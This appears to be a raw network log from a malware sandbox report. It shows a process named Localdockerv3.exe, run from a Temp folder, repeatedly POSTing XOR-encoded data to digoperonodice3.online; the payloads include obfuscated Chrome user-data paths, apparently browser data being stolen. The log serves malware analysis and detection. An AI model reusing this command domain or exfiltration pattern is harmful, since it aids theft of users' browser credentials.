                                                                                                      2024-12-27 07:15:53 UTC1369INData Raw: 08 00 b9 08 03 08 02 11 00 d5 b9 27 1f 00 a0 84 aa 1b 39 00 94 49 6c 65 76 60 73 65 76 61 17 0c 1f 02 10 00 04 00 c7 04 03 08 02 11 00 4a c7 27 17 0c 9f 3a 69 e6 a4 16 e0 b0 c9 0e a1 0d 14 00 08 00 eb 08 03 08 02 11 00 0b eb 27 c9 0e 0d 6b dd 43 fc a1 3f f3 93 b8 eb c4 ad 15 39 ab 6f 00 27 0e 10 00 04 00 c7 04 03 08 02 11 00 5e c7 27 6f 00 39 c1 cd 36 03 0c b1 65 29 0d 0e 0a 10 00 04 00 c7 04 03 08 02 11 00 0b c7 27 29 0d 37 9b 39 d2 0d 56 45 81 56 01 06 01 14 00 1f 00 b9 08 03 08 02 11 00 0b b9 27 56 01 a0 84 aa 1b 39 00 94 49 72 6a 67 58 56 61 65 68 52 4a 47 58 67 68 6d 61 6a 70 58 48 6b 67 65 68 45 74 74 40 65 70 65 76 0a 0e 06 10 00 04 00 c7 04 03 08 02 11 00 cb c7 27 76 0a ba 30 0d e8 81 f9 71 bb 20 0c 4b 04 14 00 03 00 b9 08 03 08 02 11 00 a2 b9 27
                                                                                                      Data Ascii: '9Ilev`sevaJ':i'kC?9o'^'o96e)')79VEV'V9IrjgXVaehRJGXghmajpXHkgehEtt@epev'v0q K'
                                                                                                      2024-12-27 07:15:53 UTC1369INData Raw: 57 fc 9d cc 9f 2f cf f7 ad 07 e4 02 10 00 04 00 c7 04 03 08 02 11 00 a2 c7 27 ad 07 e0 0e b7 58 da c3 cb 0b a5 09 99 02 10 00 04 00 c7 04 03 08 02 11 00 02 c7 27 a5 09 57 bd a9 c8 54 f8 a4 a0 27 03 6b 0c 14 00 08 00 eb 08 03 08 02 11 00 0b eb 27 27 03 b3 6e d2 a2 6f b5 ac 64 2d bd e4 25 3e 01 aa 3c 52 0e 06 0e 14 00 08 00 b9 08 03 08 02 11 00 5e b9 27 52 0e a0 84 aa 1b 39 00 94 49 2e 2a 69 6b 7e 68 7e 30 2a 06 fb 08 14 00 08 00 eb 08 03 08 02 11 00 80 eb 27 2a 06 34 8e 26 a1 dc dd 01 3d ab 5d 10 26 8d 69 07 65 51 0a 1b 06 14 00 4f 00 b9 08 03 08 02 11 00 d8 b9 27 51 0a a0 84 aa 1b 39 00 94 49 4d 6a 60 61 7c 61 60 40 46 58 67 6c 76 6b 69 61 29 61 7c 70 61 6a 77 6d 6b 6a 5b 63 6b 6e 6c 67 60 63 67 74 66 74 62 6d 63 67 65 61 6e 74 62 6c 62 61 63 61 6f 60 63
                                                                                                      Data Ascii: W/'X'WT'k''nod-%><R^'R9I.*ik~h~0*'*4&=]&ieQO'Q9IMj`a|a`@FXglvkia)a|pajwmkj[cknlg`cgtftbmcgeantblbacao`c
                                                                                                      2024-12-27 07:15:53 UTC1369INData Raw: 65 68 52 4a 47 78 02 5e 01 14 00 08 00 eb 08 03 08 02 11 00 d8 eb 27 78 02 81 41 fd 7d a8 f8 48 62 1b 92 cb fa f9 4c 4e 3a c0 00 40 01 14 00 15 00 b9 08 03 08 02 11 00 0b b9 27 c0 00 a0 84 aa 1b 39 00 94 49 51 68 70 76 65 52 4a 47 58 71 68 70 76 65 72 6a 67 2a 6d 6a 6d 7a 05 55 05 10 00 04 00 c7 04 03 08 02 11 00 4a c7 27 7a 05 9c ad fc de a7 60 80 8d 53 08 49 07 14 00 08 00 eb 08 03 08 02 11 00 d8 eb 27 53 08 a1 b8 8b f7 15 06 bb 97 3f 6b bd 70 44 b2 bd cf 28 02 90 02 14 00 01 00 b9 08 03 08 02 11 00 4a b9 27 28 02 a0 84 aa 1b 39 00 94 49 2e 34 08 5c 0b 14 00 08 00 eb 08 03 08 02 11 00 0b eb 27 34 08 23 0d f8 a5 d1 47 df 3f bc de ce 22 80 f3 d9 67 ba 0d 29 02 14 00 09 00 b9 08 03 08 02 11 00 a2 b9 27 ba 0d a0 84 aa 1b 39 00 94 49 71 77 61 76 2a 67 6b 6a
                                                                                                      Data Ascii: ehRJGx^'xA}HbLN:@'9IQhpveRJGXqhpverjg*mjmzUJ'z`SI'S?kpD(J'(9I.4\'4#G?"g)'9Iqwav*gkj


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.849713172.67.153.2434431296C:\Users\user\AppData\Local\Temp\Localdockerv3.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-27 07:15:55 UTC483OUTPOST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept: */*
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                      adid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1E
                                                                                                      Content-Length: 53
                                                                                                      Host: digoperonodice3.online
                                                                                                      2024-12-27 07:15:55 UTC53OUTData Raw: 00 00 00 00 fd ff ff ff 03 00 00 00 00 00 00 00 92 00 03 00 00 00 00 fe ff ff ff 02 00 00 00 00 00 00 00 91 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                      Data Ascii:
                                                                                                      2024-12-27 07:15:55 UTC755INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 27 Dec 2024 07:15:55 GMT
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K16LubgJSZ7YE82A4PT9NlNrzH5im%2BQt3Kz37yDByAoD%2BEB6kSKQf6sXIArACac2cgraRngZn6lbLfKf1v6%2FEW%2FJj7JRWOBvrInXp2Lr5dYozMbaDLk0Oqe1PjCgoZYINc5BFA9OnxC1"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f8785b03877437f-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1664&min_rtt=1628&rtt_var=636&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2857&recv_bytes=1172&delivery_rate=1793611&cwnd=79&unsent_bytes=0&cid=2ee7148847d83a65&ts=617&x=0"
                                                                                                      2024-12-27 07:15:55 UTC24INData Raw: 31 32 0d 0a 00 00 00 00 fe ff ff ff 02 00 00 00 00 00 00 00 91 90 0d 0a
                                                                                                      Data Ascii: 12
                                                                                                      2024-12-27 07:15:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2192.168.2.849714172.67.153.2434431296C:\Users\user\AppData\Local\Temp\Localdockerv3.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-27 07:15:57 UTC484OUTPOST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept: */*
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                      adid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1E
                                                                                                      Content-Length: 208
                                                                                                      Host: digoperonodice3.online
                                                                                                      2024-12-27 07:15:57 UTC208OUTData Raw: 00 00 00 00 fd ff ff ff 03 00 00 00 00 00 00 00 92 00 01 08 00 00 00 3d 81 4c 29 95 00 00 00 28 00 00 00 04 04 04 04 39 85 48 2d 07 04 04 04 04 04 04 04 96 c4 94 04 04 04 04 39 85 48 2d 66 04 04 04 04 04 04 04 54 4f 02 02 28 04 04 04 04 04 04 04 29 04 29 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 54 4f 02 03 04 04 04 04 04 04 04 04 04 04 04 04 05 04 04 04 54 4f 01 02 04 04 04 04 fb fb fb fb fb fb fb fb fb fb fb fb 04 04 fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb a0 1b 48 24 9c ee 94 49 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                      Data Ascii: =L)(9H-9H-fTO())TOTOH$I
                                                                                                      2024-12-27 07:15:58 UTC854INHTTP/1.1 204 No Content
                                                                                                      Date: Fri, 27 Dec 2024 07:15:57 GMT
                                                                                                      Connection: close
                                                                                                      catid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1E
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QucK1frha4wW%2BuHhtklpWfddUr9n5hoPWUj1TYIlmjMwg90FoISz7prEi5vl%2F8Oz%2FY5k5QihlqqgNpLQmWUydHF8SvY3cWGMEWrtoiWUyOHeO8J64LwYrDwPan0hdzhVESq8ryi7AALX"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f8785bd7a1b7c96-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1878&min_rtt=1848&rtt_var=715&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2856&recv_bytes=1328&delivery_rate=1580086&cwnd=173&unsent_bytes=0&cid=eaba6c621f5e7bfe&ts=702&x=0"


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      3192.168.2.849716172.67.153.2434431296C:\Users\user\AppData\Local\Temp\Localdockerv3.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-27 07:16:05 UTC487OUTPOST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept: */*
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                      adid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1E
                                                                                                      Content-Length: 681886
                                                                                                      Host: digoperonodice3.online
                                                                                                      2024-12-27 07:16:05 UTC15331OUTData Raw: 00 00 00 00 fd ff ff ff 03 00 00 00 00 00 00 00 92 00 01 08 00 00 00 fc d6 cc 26 e2 11 0a 00 28 00 00 00 04 04 04 04 f8 d2 c8 22 04 07 04 04 04 04 04 04 97 c4 94 96 9c c4 94 a2 47 6c 76 6b 69 61 dd 31 47 3e 58 51 77 61 76 77 58 6c 71 66 61 76 70 58 45 74 74 40 65 70 65 58 48 6b 67 65 68 58 43 6b 6b 63 68 61 58 47 6c 76 6b 69 61 58 51 77 61 76 24 40 65 70 65 95 9d c4 94 a3 40 61 62 65 71 68 70 dd 39 47 3e 58 51 77 61 76 77 58 6c 71 66 61 76 70 58 45 74 74 40 65 70 65 58 48 6b 67 65 68 58 43 6b 6b 63 68 61 58 47 6c 76 6b 69 61 58 51 77 61 76 24 40 65 70 65 58 40 61 62 65 71 68 70 dd 30 67 6c 76 6b 69 6d 71 69 5b 66 76 6b 73 77 61 76 77 58 47 6c 76 6b 69 61 58 74 76 6b 62 6d 68 61 77 58 40 61 62 65 71 68 70 58 48 6b 63 6d 6a 24 40 65 70 65 dd 35 67 6c 76 6b
                                                                                                      Data Ascii: &("Glvkia1G>XQwavwXlqfavpXEtt@epeXHkgehXCkkchaXGlvkiaXQwav$@epe@abeqhp9G>XQwavwXlqfavpXEtt@epeXHkgehXCkkchaXGlvkiaXQwav$@epeX@abeqhp0glvkimqi[fvkswavwXGlvkiaXtvkbmhawX@abeqhpXHkcmj$@epe5glvk
                                                                                                      2024-12-27 07:16:05 UTC15331OUTData Raw: 74 33 51 74 41 6a 4a 69 4b 47 71 5d 4b 7d 67 75 46 76 4e 4f 2f 69 43 73 5e 5e 54 73 4b 30 3c 30 61 77 43 52 49 65 2f 40 34 37 45 34 37 4e 55 72 4b 7c 51 4d 69 46 65 52 4c 76 4f 66 66 5d 46 36 51 6e 6c 42 43 46 62 66 43 34 4e 4c 45 37 6e 63 63 4f 76 45 37 45 51 69 4b 55 73 6b 71 30 43 65 7e 46 3d 7c 7e 71 77 2b 3c 31 4c 69 34 4d 2b 66 61 4c 70 57 70 30 49 6b 57 72 55 73 62 4b 7e 4e 31 2f 4f 57 4f 62 57 56 3d 70 5d 69 7e 40 30 65 52 70 35 36 4f 68 52 65 61 3c 47 70 70 52 4b 49 4d 41 52 55 32 4c 75 76 77 56 7e 31 6c 2b 67 52 6e 7d 66 42 5d 4b 43 2f 57 55 68 36 46 67 4c 30 4a 36 4b 57 7d 4c 43 69 35 30 53 6c 37 74 6a 49 45 4f 66 73 7d 74 74 33 7e 74 34 6d 68 53 33 63 3d 52 4d 47 49 37 30 35 35 6d 43 48 32 71 63 31 56 50 54 2b 66 4d 5d 76 74 53 6e 70 41 60 47
                                                                                                      Data Ascii: t3QtAjJiKGq]K}guFvNO/iCs^^TsK0<0awCRIe/@47E47NUrK|QMiFeRLvOff]F6QnlBCFbfC4NLE7nccOvE7EQiKUskq0Ce~F=|~qw+<1Li4M+faLpWp0IkWrUsbK~N1/OWObWV=p]i~@0eRp56OhRea<GppRKIMARU2LuvwV~1l+gRn}fB]KC/WUh6FgL0J6KW}LCi50Sl7tjIEOfs}tt3~t4mhS3c=RMGI7055mCH2qc1VPT+fM]vtSnpA`G
                                                                                                      2024-12-27 07:16:05 UTC15331OUTData Raw: 67 3d 6b 4e 55 6d 30 32 5e 35 32 37 55 42 66 4c 41 56 4f 6c 6b 67 6c 56 6b 55 42 3d 3d 71 55 3d 55 3c 4d 32 4c 4f 30 50 56 33 4f 48 50 40 7d 7d 50 37 31 61 37 63 7d 71 4b 43 6c 6c 48 72 50 69 72 53 6b 6b 32 7e 34 51 54 46 4b 3c 46 32 72 3c 37 3d 42 4e 33 30 42 75 3d 37 41 51 49 4e 41 6d 6c 46 63 6b 3c 7d 47 4c 4e 46 63 6b 3c 7c 47 54 4e 46 63 76 77 5e 46 4d 51 63 73 50 34 49 63 69 4f 55 30 4b 49 49 63 77 41 63 73 57 67 5d 46 4f 51 63 73 57 67 5e 46 41 4a 46 63 6f 2f 31 46 40 72 46 6c 6b 32 6d 49 6f 43 4f 61 35 6f 51 68 47 33 72 5d 35 42 55 7d 72 73 34 6d 30 48 57 31 72 34 77 47 6f 75 60 40 33 45 6b 4f 4c 35 2f 6c 6f 52 46 4f 62 57 72 53 56 57 51 56 6e 2b 48 6b 75 46 51 2f 6e 6f 53 46 65 5c 50 7e 7e 49 6b 42 41 75 6a 5c 36 46 56 51 40 76 3d 4d 6b 71 47 34
                                                                                                      Data Ascii: g=kNUm02^527UBfLAVOlkglVkUB==qU=U<M2LO0PV3OHP@}}P71a7c}qKCllHrPirSkk2~4QTFK<F2r<7=BN30Bu=7AQINAmlFck<}GLNFck<|GTNFcvw^FMQcsP4IciOU0KIIcwAcsWg]FOQcsWg^FAJFco/1F@rFlk2mIoCOa5oQhG3r]5BU}rs4m0HW1r4wGou`@3EkOL5/loRFObWrSVWQVn+HkuFQ/noSFe\P~~IkBAuj\6FVQ@v=MkqG4
                                                                                                      2024-12-27 07:16:05 UTC15331OUTData Raw: 7c 67 42 3c 68 46 66 51 32 71 53 5e 55 57 5e 75 45 76 3d 57 74 67 2f 43 47 4c 4c 4c 57 74 54 55 61 53 31 75 54 35 41 45 48 53 37 6a 6c 71 2b 51 46 69 6b 3d 30 75 30 3c 77 4f 77 36 47 76 66 3d 47 31 5c 4d 49 35 7d 3c 51 74 63 72 62 67 30 76 46 61 75 4d 30 5d 65 76 65 34 5c 4f 70 69 56 4d 68 37 63 32 72 4c 62 56 32 6a 6b 66 6f 35 69 52 73 61 6a 5e 7d 67 56 5e 6f 2b 37 36 62 51 6d 30 4f 6e 55 50 30 71 51 40 69 71 61 51 63 76 3d 68 42 7c 4c 4b 4b 33 77 47 43 30 67 3d 69 70 6d 7e 6f 6c 36 50 65 7d 54 6c 66 77 69 31 77 5d 50 33 2f 4b 7c 70 2b 4f 77 35 67 74 7c 57 46 67 2f 72 5e 5c 77 5d 71 56 45 4b 4f 6f 36 75 34 74 48 76 6f 54 7c 62 46 49 31 65 46 50 54 2b 41 75 50 41 5d 7e 5c 32 33 6d 6d 72 45 65 41 6f 54 3d 6a 7d 46 32 37 43 4b 41 30 47 32 74 34 75 7e 45 46
                                                                                                      Data Ascii: |gB<hFfQ2qS^UW^uEv=Wtg/CGLLLWtTUaS1uT5AEHS7jlq+QFik=0u0<wOw6Gvf=G1\MI5}<Qtcrbg0vFauM0]eve4\OpiVMh7c2rLbV2jkfo5iRsaj^}gV^o+76bQm0OnUP0qQ@iqaQcv=hB|LKK3wGC0g=ipm~ol6Pe}Tlfwi1w]P3/K|p+Ow5gt|WFg/r^\w]qVEKOo6u4tHvoT|bFI1eFPT+AuPA]~\23mmrEeAoT=j}F27CKA0G2t4u~EF
                                                                                                      2024-12-27 07:16:05 UTC15331OUTData Raw: 36 46 71 33 2f 6e 5d 71 76 49 63 5d 43 5c 66 71 5d 52 6c 7c 2f 3c 6c 4b 2f 37 65 43 42 57 33 55 67 43 77 4c 63 7d 32 52 33 7d 4b 33 42 6b 73 68 2b 55 5c 60 53 48 51 5c 4d 75 6a 75 76 76 31 35 2b 4a 4d 6e 6c 42 45 54 49 5e 35 68 32 72 6d 6d 48 4b 45 42 75 4c 7e 6d 50 4d 7e 3d 55 2b 35 5e 6c 4b 72 2b 30 62 74 2b 71 54 30 62 76 72 2f 4c 32 2b 2b 6c 2f 6a 2f 30 2b 6c 2f 71 2b 30 62 76 2b 2f 4c 32 62 33 6e 2f 4c 32 33 2b 6c 2f 72 2b 30 62 74 2b 71 54 30 62 76 72 2f 4c 32 2b 2b 6c 2f 6a 2f 30 2b 6c 2f 71 2b 30 62 76 2b 2f 4c 32 62 33 6e 2f 72 73 6a 53 2b 73 70 77 2b 60 3d 73 4d 57 70 3c 7c 34 33 7d 43 42 30 73 45 4f 5c 55 4c 6b 46 4f 4c 74 72 50 42 4f 6f 7c 68 6c 6b 7e 4e 6b 32 42 57 43 6f 5c 36 67 32 3c 33 57 5e 50 73 31 43 56 60 37 33 73 35 2f 35 46 4d 63 50
                                                                                                      Data Ascii: 6Fq3/n]qvIc]C\fq]Rl|/<lK/7eCBW3UgCwLc}2R3}K3Bksh+U\`SHQ\Mujuvv15+JMnlBETI^5h2rmmHKEBuL~mPM~=U+5^lKr+0bt+qT0bvr/L2++l/j/0+l/q+0bv+/L2b3n/L23+l/r+0bt+qT0bvr/L2++l/j/0+l/q+0bv+/L2b3n/rsjS+spw+`=sMWp<|43}CB0sEO\ULkFOLtrPBOo|hlk~Nk2BWCo\6g2<3W^Ps1CV`73s5/5FMcP
                                                                                                      2024-12-27 07:16:05 UTC15331OUTData Raw: 62 45 56 7c 49 36 46 49 67 6e 40 2f 60 42 49 50 6d 4f 6f 33 6a 47 5e 5c 2b 77 6f 40 49 3c 6b 70 42 6b 6f 7d 6b 69 47 41 76 6d 55 32 31 7e 51 51 4a 69 2b 66 40 30 6b 56 4e 4c 43 36 7e 6b 54 65 6e 46 60 6e 48 49 37 66 32 55 4d 56 68 41 6d 77 3d 4f 4b 4c 65 41 50 32 66 67 67 6d 54 30 50 74 67 66 41 57 4b 37 37 4d 56 73 7d 6d 4e 4b 4c 4e 7c 63 41 74 3d 41 6d 6b 52 75 45 65 2b 4d 42 5e 4e 5d 72 5d 6b 36 6a 36 75 4a 43 56 51 2b 6a 37 41 4a 57 3c 53 6e 5d 6b 42 43 63 34 50 40 30 6d 71 74 36 43 4c 7c 47 6a 3c 54 6a 72 53 48 71 6f 62 6c 46 71 2b 47 68 37 4a 60 4b 46 4b 43 43 2f 7e 46 6c 7c 33 4b 6c 34 45 4f 63 76 33 63 6e 5e 53 50 74 70 35 3c 66 69 49 52 41 60 47 4a 52 67 6e 4f 66 65 7c 6c 72 48 4f 55 70 37 31 4d 36 6e 68 4e 55 6f 7e 63 33 66 53 67 55 31 4b 65 40
                                                                                                      Data Ascii: bEV|I6FIgn@/`BIPmOo3jG^\+wo@I<kpBko}kiGAvmU21~QQJi+f@0kVNLC6~kTenF`nHI7f2UMVhAmw=OKLeAP2fggmT0PtgfAWK77MVs}mNKLN|cAt=AmkRuEe+MB^N]r]k6j6uJCVQ+j7AJW<Sn]kBCc4P@0mqt6CL|Gj<TjrSHqoblFq+Gh7J`KFKCC/~Fl|3Kl4EOcv3cn^SPtp5<fiIRA`GJRgnOfe|lrHOUp71M6nhNUo~c3fSgU1Ke@
                                                                                                      2024-12-27 07:16:05 UTC15331OUTData Raw: 49 63 52 4c 74 4a 3c 49 61 67 34 66 35 72 69 48 41 63 6d 6b 4f 63 42 57 55 55 46 66 34 41 57 63 7d 56 4c 4d 6d 36 32 61 6e 43 70 41 60 77 45 46 4c 67 34 69 32 47 60 57 36 30 67 47 68 57 3d 56 4f 6c 7d 54 47 6b 36 4e 75 6d 57 6d 35 7d 6c 69 74 77 6b 52 4a 45 5e 56 71 57 40 6d 7c 52 71 54 7e 40 6f 69 67 4a 31 4c 5c 7c 46 66 52 37 56 67 4f 5e 77 56 51 49 6e 47 2f 3c 4c 65 48 45 70 3d 7d 63 32 32 72 4e 5c 46 33 70 3c 37 68 4b 70 56 4b 42 30 3d 68 60 46 4f 75 67 45 6b 62 6b 68 47 74 56 5c 72 34 56 56 6d 70 51 72 67 60 6c 7d 49 69 7c 2b 50 4e 4c 6b 52 6a 6b 7c 56 53 4f 6f 41 5d 63 74 41 6b 3c 76 4e 3c 47 70 4c 34 4f 40 6c 4b 74 6f 57 2f 63 71 63 65 32 62 52 52 66 50 4b 47 7d 3d 65 36 70 6b 62 48 34 4b 6e 50 4c 33 55 49 34 54 47 5c 66 60 2f 4b 69 34 62 34 60 41
                                                                                                      Data Ascii: IcRLtJ<Iag4f5riHAcmkOcBWUUFf4AWc}VLMm62anCpA`wEFLg4i2G`W60gGhW=VOl}TGk6NumWm5}litwkRJE^VqW@m|RqT~@oigJ1L\|FfR7VgO^wVQInG/<LeHEp=}c22rN\F3p<7hKpVKB0=h`FOugEkbkhGtV\r4VVmpQrg`l}Ii|+PNLkRjk|VSOoA]ctAk<vN<GpL4O@lKtoW/cqce2bRRfPKG}=e6pkbH4KnPL3UI4TG\f`/Ki4b4`A
                                                                                                      2024-12-27 07:16:05 UTC15331OUTData Raw: 72 30 72 6a 46 4b 6f 43 53 46 31 51 71 75 3d 66 4e 31 54 76 76 5e 4b 60 75 6e 67 36 55 7c 40 69 50 6e 40 37 36 55 65 73 72 32 61 31 5d 31 68 4a 6e 49 47 60 61 31 7d 31 37 36 6a 5c 48 7e 7d 48 6c 77 69 56 6c 72 55 67 36 31 54 67 36 4c 31 71 3d 48 6b 5d 2f 37 71 56 56 41 51 57 42 51 6a 51 71 6d 5c 75 4f 4a 70 48 41 49 3c 4a 72 60 48 77 6d 3d 5e 2b 36 61 62 76 61 4c 7c 2f 71 6c 3d 65 36 5d 31 4c 6f 66 54 31 5c 63 40 62 37 7c 2b 7c 62 67 50 37 69 3c 6e 37 76 36 51 61 32 47 52 6d 77 74 68 49 30 66 69 5e 6a 55 62 2f 35 2b 49 72 7c 50 5e 42 69 5d 3c 7d 49 7e 3d 63 31 6a 7e 41 7e 46 41 7e 66 7d 4d 7e 2b 3d 69 34 31 2b 42 6b 6e 31 6a 62 3c 70 32 5c 5d 6c 43 6a 56 5e 7d 36 6d 5e 73 36 75 70 65 41 63 52 76 66 43 50 42 66 7c 43 7d 66 7c 36 7e 3d 30 47 73 2f 30 6f 43
                                                                                                      Data Ascii: r0rjFKoCSF1Qqu=fN1Tvv^K`ung6U|@iPn@76Uesr2a1]1hJnIG`a1}176j\H~}HlwiVlrUg61Tg6L1q=Hk]/7qVVAQWBQjQqm\uOJpHAI<Jr`Hwm=^+6abvaL|/ql=e6]1LofT1\c@b7|+|bgP7i<n7v6Qa2GRmwthI0fi^jUb/5+Ir|P^Bi]<}I~=c1j~A~FA~f}M~+=i41+Bkn1jb<p2\]lCjV^}6m^s6upeAcRvfCPBf|C}f|6~=0Gs/0oC
                                                                                                      2024-12-27 07:16:05 UTC15331OUTData Raw: 55 62 71 47 4a 66 4f 48 45 5c 55 5c 2f 4b 49 4d 42 6d 4e 60 6c 62 6c 56 30 75 4f 6b 49 34 56 52 57 69 45 53 6d 4a 68 34 73 40 40 4b 62 4d 3c 30 49 36 56 52 46 55 4e 61 40 47 5d 5e 53 7e 7d 63 6d 70 4f 57 6f 5e 60 45 55 54 6d 6b 32 65 50 6a 41 57 4d 6c 70 61 5c 63 72 69 46 65 32 63 76 70 31 46 4a 30 6d 62 40 61 30 56 75 6f 67 35 46 70 30 45 67 74 50 51 67 45 37 49 4a 73 47 5d 6a 66 4d 6a 69 41 4d 49 6c 55 33 66 4f 49 43 46 47 6d 74 4c 4e 41 42 4b 43 5e 63 65 6a 6e 75 49 68 43 4a 67 42 71 63 45 6e 53 7d 66 67 49 46 5c 37 6f 52 2b 47 32 69 67 6e 6f 4e 6a 63 35 34 50 46 65 46 4d 52 7c 2b 69 43 46 60 35 75 46 67 77 4e 7c 67 54 63 49 48 6b 74 42 52 45 6b 3c 31 77 6c 51 43 53 73 5c 5c 40 3d 5d 43 50 76 4b 41 7d 45 41 53 55 30 53 48 45 6d 77 43 4b 34 70 30 50 51
                                                                                                      Data Ascii: UbqGJfOHE\U\/KIMBmN`lblV0uOkI4VRWiESmJh4s@@KbM<0I6VRFUNa@G]^S~}cmpOWo^`EUTmk2ePjAWMlpa\criFe2cvp1FJ0mb@a0Vuog5Fp0EgtPQgE7IJsG]jfMjiAMIlU3fOICFGmtLNABKC^cejnuIhCJgBqcEnS}fgIF\7oR+G2ignoNjc54PFeFMR|+iCF`5uFgwN|gTcIHktBREk<1wlQCSs\\@=]CPvKA}EASU0SHEmwCK4p0PQ
                                                                                                      2024-12-27 07:16:05 UTC15331OUTData Raw: 3d 32 2f 2f 49 75 50 45 5e 32 67 71 5c 40 4e 68 66 77 70 70 5c 5e 54 6c 6b 41 72 48 5c 49 54 4e 6e 49 69 40 45 36 4f 37 76 4b 55 45 61 69 74 34 61 31 49 4c 4d 72 6d 77 45 75 50 77 53 5e 6c 35 68 2b 30 7d 37 75 54 71 47 36 37 53 36 35 32 57 7c 60 63 7e 6a 62 4b 40 4a 2f 7c 75 6e 2b 61 32 4f 3c 62 43 53 32 41 50 60 7d 63 54 46 7e 5e 4a 60 72 40 33 74 6b 7c 54 52 36 4a 2b 51 7e 50 52 4d 36 41 2b 51 7e 6e 6e 4c 4c 6c 2f 4e 41 6e 33 75 54 49 57 68 48 35 6f 60 5d 5e 30 37 6e 77 63 6d 41 7e 71 54 55 52 54 45 5d 34 5d 55 53 54 56 5e 61 2f 63 6c 62 46 42 33 4b 47 7c 3c 47 51 33 3c 66 77 4e 52 74 69 7c 33 40 41 56 52 36 4f 7c 72 68 72 6a 7c 6f 53 45 6e 7d 7c 62 4b 50 7c 49 34 32 31 36 42 74 74 6f 37 6b 55 31 72 54 57 33 68 33 4d 53 72 76 60 4f 54 75 60 3c 62 67 4c
                                                                                                      Data Ascii: =2//IuPE^2gq\@Nhfwpp\^TlkArH\ITNnIi@E6O7vKUEait4a1ILMrmwEuPwS^l5h+0}7uTqG67S652W|`c~jbK@J/|un+a2O<bCS2AP`}cTF~^J`r@3tk|TR6J+Q~PRM6A+Q~nnLLl/NAn3uTIWhH5o`]^07nwcmA~qTURTE]4]USTV^a/clbFB3KG|<GQ3<fwNRti|3@AVR6O|rhrj|oSEn}|bKP|I4216Btto7kU1rTW3h3MSrv`OTu`<bgL
                                                                                                      2024-12-27 07:16:07 UTC869INHTTP/1.1 204 No Content
                                                                                                      Date: Fri, 27 Dec 2024 07:16:07 GMT
                                                                                                      Connection: close
                                                                                                      catid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1E
                                                                                                      cf-cache-status: DYNAMIC
